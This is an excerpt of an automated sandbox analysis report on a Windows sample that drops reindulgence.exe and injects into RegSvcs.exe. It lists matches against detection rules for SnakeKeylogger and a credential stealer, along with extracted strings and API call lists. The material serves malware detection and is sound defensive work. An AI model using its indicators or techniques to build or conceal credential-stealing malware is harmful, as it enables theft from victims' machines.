                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B39576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00B39576
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FF9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00FF9576

                System Summary

                barindex
                Source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: Process Memory Space: reindulgence.exe PID: 768, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 4612, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: reindulgence.exe PID: 5316, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: oagkiAhXgZ.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: oagkiAhXgZ.exe, 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b5c12eee-9
                Source: oagkiAhXgZ.exe, 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6ce066c7-c
                Source: oagkiAhXgZ.exe, 00000000.00000003.2064930609.0000000003BB1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7bbdb9bd-5
                Source: oagkiAhXgZ.exe, 00000000.00000003.2064930609.0000000003BB1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e56ea650-1
                Source: reindulgence.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: reindulgence.exe, 00000002.00000000.2065227905.0000000001022000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0afb33e6-3
                Source: reindulgence.exe, 00000002.00000000.2065227905.0000000001022000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4d84680d-4
                Source: reindulgence.exe, 00000006.00000002.2261080017.0000000001022000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7c0ffe92-4
                Source: reindulgence.exe, 00000006.00000002.2261080017.0000000001022000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7962a937-5
                Source: oagkiAhXgZ.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e536c391-a
                Source: oagkiAhXgZ.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_07f22056-7
                Source: reindulgence.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_09da450d-a
                Source: reindulgence.exe.0.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_45d5f095-3
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B0D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00B0D5EB
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B01201
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B0E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00B0E8F6
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FCE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00FCE8F6
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AA80600_2_00AA8060
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B120460_2_00B12046
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B082980_2_00B08298
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00ADE4FF0_2_00ADE4FF
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AD676B0_2_00AD676B
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B348730_2_00B34873
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00ACCAA00_2_00ACCAA0
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AACAF00_2_00AACAF0
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00ABCC390_2_00ABCC39
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AD6DD90_2_00AD6DD9
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00ABD0640_2_00ABD064
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AA91C00_2_00AA91C0
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00ABB1190_2_00ABB119
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AC13940_2_00AC1394
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AC17060_2_00AC1706
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AC781B0_2_00AC781B
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AC19B00_2_00AC19B0
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AA79200_2_00AA7920
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AB997D0_2_00AB997D
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AC7A4A0_2_00AC7A4A
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AC7CA70_2_00AC7CA7
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AC1C770_2_00AC1C77
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AD9EEE0_2_00AD9EEE
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B2BE440_2_00B2BE44
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AC1F320_2_00AC1F32
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_017C71080_2_017C7108
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F680602_2_00F68060
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FD20462_2_00FD2046
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FC82982_2_00FC8298
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F9E4FF2_2_00F9E4FF
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F9676B2_2_00F9676B
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FF48732_2_00FF4873
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F6CAF02_2_00F6CAF0
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F8CAA02_2_00F8CAA0
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F7CC392_2_00F7CC39
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F96DD92_2_00F96DD9
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F691C02_2_00F691C0
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F7B1192_2_00F7B119
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F813942_2_00F81394
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F817062_2_00F81706
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F8781B2_2_00F8781B
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F819B02_2_00F819B0
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F7997D2_2_00F7997D
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F679202_2_00F67920
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F87A4A2_2_00F87A4A
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FB3CE72_2_00FB3CE7
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F87CA72_2_00F87CA7
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F81C772_2_00F81C77
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F99EEE2_2_00F99EEE
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FEBE442_2_00FEBE44
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F81F322_2_00F81F32
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_0128E4802_2_0128E480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0275D2783_2_0275D278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_027553623_2_02755362
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0275C1473_2_0275C147
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0275C7383_2_0275C738
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0275CA083_2_0275CA08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_027569A03_2_027569A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0275E9883_2_0275E988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02753E093_2_02753E09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02756FC83_2_02756FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0275CFA93_2_0275CFA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0275CCD83_2_0275CCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02759DE03_2_02759DE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0275F6313_2_0275F631
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0275FA883_2_0275FA88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0275E97B3_2_0275E97B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06331E803_2_06331E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_063317A03_2_063317A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06339C703_2_06339C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_063395483_2_06339548
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06330B303_2_06330B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_063350283_2_06335028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_063329683_2_06332968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633DE003_2_0633DE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06331E703_2_06331E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633E6B03_2_0633E6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633E6AF3_2_0633E6AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633EF603_2_0633EF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633EF513_2_0633EF51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0633178F3_2_0633178F
